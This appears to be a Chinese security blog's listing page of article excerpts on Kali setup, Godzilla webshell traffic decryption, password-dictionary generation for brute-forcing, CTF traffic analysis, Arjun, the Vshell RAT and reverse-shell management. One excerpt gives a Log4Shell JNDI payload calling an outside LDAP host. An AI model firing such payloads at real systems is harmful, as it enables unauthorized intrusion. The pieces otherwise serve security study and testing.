摘要:
通过kali安装将 Kali Linux 源添加到 sources.list 文件: 打开 /etc/apt/sources.list 文件,然后将以下行添加到文件末尾: deb http://http.kali.org/kali kali-rolling main non-free contrib 阅读全文
|
摘要:
通过kali安装将 Kali Linux 源添加到 sources.list 文件: 打开 /etc/apt/sources.list 文件,然后将以下行添加到文件末尾: deb http://http.kali.org/kali kali-rolling main non-free contrib 阅读全文
摘要:
哥斯拉是继菜刀、蚁剑、冰蝎之后的又一个webshell利器,这里就不过多介绍了。GitHub地址:https://github.com/BeichenDream/Godzilla很多一线师傅不太了解其中的加解密手法,无法进行解密,这篇文章介绍了解密的方式方法,主要补全了网上缺少的ASP流量分析、PH 阅读全文
摘要:
Veracrypt怎么用 接下来,我们开始讲解Veracrypt的使用方法。 1、创建一个加密容器 1.1、下载Veracrypt软件,安装并打开。选择“创建加密文件容器”。 下载链接:https://www.veracrypt.fr/en/Downloads.html Copy 1.2、选择容器的 阅读全文
摘要:
说实话平时一般不会自己去生成字典,普通的字典包就够用了,前段时间打红队的时候遇到了一次内网中数据库密码为vule前缀的,但是内网中其他数据库密码还未知,于是就需要以vule前缀自己生成一下密码尝试爆破。就有了这篇文章分享。 wget https://sourceforge.net/projects/ 阅读全文
摘要:
流量分析 流量分析是CTF里面的常见题目,通常会给我们一堆数据包,然后让我们用Wireshark分析流量包里面的内容排除无关信息然后获取隐藏的flag 链接:https://pan.baidu.com/s/1I-YQhV2VVGE1DZXb_WlnSA?pwd=c93i提取码:c93i 工具: ht 阅读全文
摘要:
0x00 前言 CVE-2021-44228 log4j:2.0 <= Apache log4j <= 2.14.1 patched of Java version:6u211+, 7u201+,8u191+, 11.0.1+ 基本Payload: ${jndi:ldap://dnslog.cn/a 阅读全文
摘要:
1、简介 Arjun是一款可以找到URL端点查询参数的工具。Web应用程序使用参数(或查询)来接受用户输入,此工具可以帮助渗透测试人员方便查找隐藏的参数。 2、内容 此工具支持以下功能: 支持GET/POST/POST-JSON/POST-XML请求自动处理速率限制和超时将结果导出到:BurpSui 阅读全文
摘要:
写在前面 "Vshell 是一款go编写的主机群管理工具(RAT)"。 发现Vshell作者团队非常低调,项目Github上Readme介绍非常简短,网上也很少有使用介绍。写个基础入门,记录从配置到主机管理、搭建隧道。本文仅作为工具介绍,请勿用于任何违法场景。 未经授权请勿利用文章中的技术资料对任何 阅读全文
摘要:
https://github.com/tdragon6 功能特点 • 支持平台 • 架构图 • 快速构建 • 使用文档 • 部分功能演示 • 免责声明 • 致谢 简体中文 • English 在常规渗透测试和比赛中,反弹shell时是否在为 Ctrl + C 意外关闭Shell而发愁?是否在为执行一 阅读全文
|